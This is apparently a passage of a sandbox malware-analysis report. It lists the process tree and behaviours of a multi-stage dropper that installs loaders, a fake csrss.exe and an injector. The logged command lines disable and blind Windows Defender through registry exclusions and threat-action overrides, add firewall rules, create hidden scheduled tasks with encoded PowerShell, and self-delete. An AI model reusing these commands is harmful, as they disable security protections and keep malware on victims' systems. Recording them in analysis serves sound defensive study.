      - C:\Users\Admin\AppData\Local\Temp\u1ag.0.exe | "C:\Users\Admin\AppData\Local\Temp\u1ag.0.exe" | PID 820
        - Checks computer location settings
        - Executes dropped EXE
        - Loads dropped DLL
        - Checks processor information in registry
        - Suspicious behavior: EnumeratesProcesses
        - C:\Windows\SysWOW64\cmd.exe | "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\HDGDHCGCBK.exe" | PID 5264
          - C:\Users\Admin\AppData\Local\Temp\HDGDHCGCBK.exe | "C:\Users\Admin\AppData\Local\Temp\HDGDHCGCBK.exe" | PID 5628
            - Checks computer location settings
            - Executes dropped EXE
            - C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\HDGDHCGCBK.exe | PID 4668
              - C:\Windows\SysWOW64\PING.EXE | ping 2.2.2.2 -n 1 -w 3000 | PID 3084
                - Runs ping.exe
        - C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 820 -s 3268 | PID 5952
          - Program crash
      - C:\Users\Admin\AppData\Local\Temp\u1ag.1.exe | "C:\Users\Admin\AppData\Local\Temp\u1ag.1.exe" | PID 4956
        - Executes dropped EXE
        - Suspicious use of SetWindowsHookEx
        - C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" " | PID 5432
          - C:\Windows\SysWOW64\chcp.com | chcp 1251 | PID 5880
          - C:\Windows\SysWOW64\schtasks.exe | schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F | PID 6004
            - Creates scheduled task(s)
      - C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 1672 -s 1556 | PID 3080
        - Program crash
    - C:\Users\Admin\Pictures\HJcsbqzHq8hiX6npx01bsD0k.exe | "C:\Users\Admin\Pictures\HJcsbqzHq8hiX6npx01bsD0k.exe" | PID 2696
      - Executes dropped EXE
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile | PID 6040
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      - C:\Users\Admin\Pictures\HJcsbqzHq8hiX6npx01bsD0k.exe | "C:\Users\Admin\Pictures\HJcsbqzHq8hiX6npx01bsD0k.exe" | PID 5904
        - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile | PID 4988
        - C:\Windows\system32\cmd.exe | C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes" | PID 3460
          - C:\Windows\system32\netsh.exe | netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes | PID 5744
            - Modifies Windows Firewall
        - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile | PID 1980
        - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile | PID 2208
    - C:\Users\Admin\Pictures\gOQS8nuAiujAwUuADEy77FZC.exe | "C:\Users\Admin\Pictures\gOQS8nuAiujAwUuADEy77FZC.exe" | PID 2772
      - Executes dropped EXE
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile | PID 6032
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      - C:\Users\Admin\Pictures\gOQS8nuAiujAwUuADEy77FZC.exe | "C:\Users\Admin\Pictures\gOQS8nuAiujAwUuADEy77FZC.exe" | PID 5852
        - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile | PID 5776
        - C:\Windows\system32\cmd.exe | C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes" | PID 5520
          - C:\Windows\system32\netsh.exe | netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes | PID 6080
            - Modifies Windows Firewall
        - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile | PID 5760
        - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile | PID 6116
    - C:\Users\Admin\Pictures\9J0qa6e7aiaDLK5JDqoWIdOI.exe | "C:\Users\Admin\Pictures\9J0qa6e7aiaDLK5JDqoWIdOI.exe" | PID 4988
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" | PID 4812
        - Suspicious use of NtCreateUserProcessOtherParentProcess
        - Suspicious behavior: EnumeratesProcesses
        - C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 4812 -s 632 | PID 5728
          - Program crash
        - C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 4812 -s 644 | PID 5144
          - Program crash
      - C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 4988 -s 872 | PID 3852
        - Program crash
    - C:\Users\Admin\Pictures\qwm9RVjuf5jbu5aLONlULih1.exe | "C:\Users\Admin\Pictures\qwm9RVjuf5jbu5aLONlULih1.exe" | PID 3420
      - Modifies firewall policy service
      - Windows security bypass
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Windows security modification
      - Checks whether UAC is enabled
      - Drops file in System32 directory
      - Suspicious use of NtSetInformationThreadHideFromDebugger
    - C:\Users\Admin\Pictures\8CLOmIiMrlPxKA256rlqHgAu.exe | "C:\Users\Admin\Pictures\8CLOmIiMrlPxKA256rlqHgAu.exe" | PID 1556
      - Executes dropped EXE
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile | PID 6048
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      - C:\Users\Admin\Pictures\8CLOmIiMrlPxKA256rlqHgAu.exe | "C:\Users\Admin\Pictures\8CLOmIiMrlPxKA256rlqHgAu.exe" | PID 1012
        - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile | PID 4080
        - C:\Windows\system32\cmd.exe | C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes" | PID 1672
          - C:\Windows\system32\netsh.exe | netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes | PID 5732
            - Modifies Windows Firewall
        - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile | PID 5452
        - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile | PID 6084
        - C:\Windows\rss\csrss.exe | C:\Windows\rss\csrss.exe | PID 6056
          - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile | PID 5512
          - C:\Windows\SYSTEM32\schtasks.exe | schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F | PID 5196
            - Creates scheduled task(s)
          - C:\Windows\SYSTEM32\schtasks.exe | schtasks /delete /tn ScheduledUpdate /f | PID 5704
          - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile | PID 5728
          - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile | PID 5292
          - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe | C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll | PID 5140
          - C:\Windows\SYSTEM32\schtasks.exe | schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F | PID 4372
            - Creates scheduled task(s)
          - C:\Windows\windefender.exe | "C:\Windows\windefender.exe" | PID 3220
            - C:\Windows\SysWOW64\cmd.exe | cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) | PID 1112
              - C:\Windows\SysWOW64\sc.exe | sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) | PID 4668
                - Launches sc.exe
    - C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe | "C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe" --silent --allusers=0 | PID 1308
      - Executes dropped EXE
      - Loads dropped DLL
      - Enumerates connected drives
      - Modifies system certificate store
      - Suspicious use of WriteProcessMemory
      - C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe | C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6f66e1a8,0x6f66e1b4,0x6f66e1c0
- Executes dropped EXE
- Loads dropped DLL
PID:888
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\LfewfClIhATqHqW1CxsJIhoA.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\LfewfClIhATqHqW1CxsJIhoA.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4820
-
-
C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe"C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1308 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240328125931" --session-guid=e2d223d4-5c1c-42e9-b90e-18b38193d849 --server-tracking-blob=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 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=3C050000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exeC:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x2a4,0x2a8,0x2ac,0x274,0x2b0,0x6e04e1a8,0x6e04e1b4,0x6e04e1c05⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3916
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"4⤵
- Executes dropped EXE
PID:5780
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\assistant\assistant_installer.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4420 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x5c0040,0x5c004c,0x5c00585⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1440
-
-
-
-
C:\Users\Admin\Pictures\9As7Ub276Pn8UYWeX7WAnwst.exe"C:\Users\Admin\Pictures\9As7Ub276Pn8UYWeX7WAnwst.exe"3⤵
- Executes dropped EXE
PID:5368 -
C:\Users\Admin\AppData\Local\Temp\7zS6EB3.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
PID:5788 -
C:\Users\Admin\AppData\Local\Temp\7zS8AD6.tmp\Install.exe.\Install.exe /WZFcdidyRl "385118" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:5864 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:5512
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:3676
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:5880
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:5940
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:4140
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:2392
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵PID:5264
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵PID:5580
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gcJakxJLt" /SC once /ST 08:15:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:5384
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gcJakxJLt"6⤵PID:488
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gcJakxJLt"6⤵PID:5148
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 13:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\WoogSGn.exe\" id /Vfsite_idZiD 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5880
-
-
-
-
-
C:\Users\Admin\Pictures\5TVfzHVntQFq0XimVhZ7m8WF.exe"C:\Users\Admin\Pictures\5TVfzHVntQFq0XimVhZ7m8WF.exe"3⤵
- Executes dropped EXE
PID:5376 -
C:\Users\Admin\AppData\Local\Temp\7zS6F3F.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
PID:5796 -
C:\Users\Admin\AppData\Local\Temp\7zSA38E.tmp\Install.exe.\Install.exe /WZFcdidyRl "385118" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:1400 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:224
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:5772
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:5968
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:4924
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:3452
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:2440
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵PID:5884
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵PID:1460
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gBsBRFkNk" /SC once /ST 10:33:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:2112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gBsBRFkNk"6⤵PID:4024
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gBsBRFkNk"6⤵PID:3472
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 13:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\JTzAdqm.exe\" id /JDsite_idDPR 385118 /S" /V1 /F6⤵
- Creates scheduled task(s)
PID:5724
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4988 -ip 49881⤵PID:3472
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1672 -ip 16721⤵PID:1720
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4596
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:1488
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4812 -ip 48121⤵PID:5620
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4812 -ip 48121⤵PID:5776
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4200 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4204 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1328
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 820 -ip 8201⤵PID:5484
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:5612
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:6032
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2460
-
C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\JTzAdqm.exeC:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\JTzAdqm.exe id /JDsite_idDPR 385118 /S1⤵PID:1296
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 